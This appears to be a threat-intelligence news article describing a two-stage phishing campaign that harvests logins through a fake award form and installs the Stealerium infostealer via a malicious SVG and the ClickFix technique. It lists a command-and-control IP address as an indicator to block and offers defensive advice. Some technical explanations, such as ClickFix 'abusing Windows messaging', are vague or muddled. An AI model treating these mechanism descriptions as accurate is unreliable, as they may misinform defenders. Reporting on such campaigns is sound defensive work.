Executive Award Phishing Scam Deploys Stealerium Malware via ClickFix Exploit
A sophisticated phishing campaign, dubbed the Executive Award scam, has emerged, targeting organizations with a deceptive scheme that combines social engineering tactics with advanced malware deployment. This two-stage attack first lures victims into divulging their login credentials through a counterfeit HTML form and subsequently installs the Stealerium information stealer on compromised systems.
Stage One: Credential Harvesting
The attack initiates with an intricately designed HTML phishing page titled Virtual-Gift-Card-Claim.html, which masquerades as a legitimate corporate award notification. Unsuspecting users, believing they are verifying their account credentials to claim an executive award, are prompted to enter their login information. Unbeknownst to them, this data is immediately transmitted to a Telegram command-and-control server operated by the attackers. This credential harvesting phase serves as the first stage of the infection chain.
Stage Two: Malware Deployment via ClickFix Exploit
Following the successful acquisition of credentials, the attackers proceed to the second stage by delivering a malicious SVG file named account-verification-form.svg. This file contains a sophisticated PowerShell script that exploits the ClickFix chain—a known technique that abuses Windows messaging systems to execute hidden commands. The PowerShell code then downloads and installs the Stealerium infostealer on the victim’s computer without their knowledge or consent.
Understanding the Infection Mechanism
The strength of this attack lies in its exploitation of legitimate Windows features to execute malicious activities covertly. When the malicious SVG file is opened, the embedded PowerShell commands execute with minimal visibility. The ClickFix chain abuses legitimate Windows messaging protocols to trigger the execution without raising typical security alerts. From there, Stealerium downloads additional components, including the main DLL file, batch scripts, and command executables. The malware then establishes persistence, ensuring it survives system restarts and continues stealing data.
Stealerium Malware: A Persistent Threat
Stealerium is a potent information stealer that operates silently to extract sensitive information from infected systems. The malware communicates with command-and-control servers at 31.57.147.77:6464 and uses multiple download endpoints to retrieve additional components and commands. This architecture allows attackers to adapt their attack in real time based on system conditions and security measures already in place.
Recommendations for Organizations
To mitigate the risks associated with this campaign, organizations should implement the following measures:
– Monitor for Unusual PowerShell Activity: Keep an eye out for unexpected PowerShell executions, especially those initiated from non-standard sources.
– Inspect SVG File Executions: Be cautious of SVG files that, when opened, trigger scripts or commands.
– Network Monitoring: Block access to known malicious IP addresses, such as 31.57.147.77:6464, and monitor for DNS requests associated with this campaign.
– User Education: Educate employees about the dangers of unsolicited emails claiming executive recognition or award notifications, as these remain effective social engineering vectors.
By staying vigilant and implementing robust security measures, organizations can protect themselves against sophisticated phishing campaigns like the Executive Award scam.
